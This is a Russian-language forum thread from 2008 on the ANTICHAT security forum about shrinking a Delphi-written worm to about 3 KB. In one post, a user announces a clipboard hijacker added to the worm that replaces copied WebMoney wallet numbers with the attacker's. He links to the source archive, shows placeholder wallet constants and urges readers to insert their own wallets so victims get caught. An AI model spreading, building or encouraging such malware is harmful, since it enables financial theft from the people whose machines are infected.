ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

10.02.2008, 23:16
|
|
Познающий
Регистрация: 05.06.2007
Сообщений: 50
Провел на форуме: 151281
Репутация:
259
|
|
Даже размером в полтора килобайта.
Слова человека любящего споры типа - а вот мой дешка - капитан на корабле!!!))) Вообще если сделать не службой, как у меня, и не делать api-шный счётчик, а использовать sleep() то размер составит окло 1200 байт..
Кстати на делфи тоже можно сделать еще меньше если модуль компилить с помощью Delphi3 в OBJ и собирать майкрософтовским линкером.
Извиняюсь за жаргон, без соплей известно, кстати таким методом я многие программы в том числе и представленные на аччате писал, но в этом случае этот вариант оказался меньше размером.. Поясняю. Если писать проги этим методом, то их нельзя упаковывать ибо они после этого отказуются работать, а прога написанная без RTL имеет стандартный формат и поэтому может быть упакованной.. Так вот, прога компилированная тем методом имеет вес 3100 байт...
На счет дополнительных функций я думаю добавить в черв на всякий пожарный WM-троя... Исходник в этом же топике выложу...
|
|
|

11.02.2008, 19:53
|
|
Новичок
Регистрация: 26.06.2007
Сообщений: 16
Провел на форуме: 236658
Репутация:
37
|
|
Ни кого не хотел обидеть.
|
|
|

13.02.2008, 13:44
|
|
Познающий
Регистрация: 05.06.2007
Сообщений: 50
Провел на форуме: 151281
Репутация:
259
|
|
Как и обещал, добавил в этого червя функцию WM-троя (подменщик буфера обмена с номером кошелька).. Теперь червь после пака FSG2 весит 3029 байт, т.е. почти дотягивает до трёх килобай... Вот исходник: virusoff.pisem.su/WM_WORM.RAR . Компилировать исходник нужно так же как и предыдущий... В случае применения не забудьте в константах вставить свои кошельки, авось кто-то и поймается)))
Код:
U = 'U11111111111';
E = 'E22222222222';
R = 'R33333333333';
Z = 'Z44444444444';
|
|
|

21.02.2008, 20:06
|
|
Участник форума
Регистрация: 09.01.2008
Сообщений: 120
Провел на форуме: 103538
Репутация:
29
|
|
Кстати на делфи тоже можно сделать еще меньше если модуль компилить с помощью Delphi3 в OBJ и собирать майкрософтовским линкером.
Это точно
|
|
|

22.02.2008, 23:38
|
|
Познающий
Регистрация: 05.06.2007
Сообщений: 50
Провел на форуме: 151281
Репутация:
259
|
|
Сообщение от Второй поддакнул
Сообщение от Один ляпнул
Кстати на делфи тоже можно сделать еще меньше если модуль компилить с помощью Delphi3 в OBJ и собирать майкрософтовским линкером.
Это точно
Я же ответил на вопрос, по поводу целесообразности применения этого метода.. Зачем создавать оффтопно-флудёрские посты??
|
|
|

26.02.2008, 04:18
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 84
Провел на форуме: 373338
Репутация:
25
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|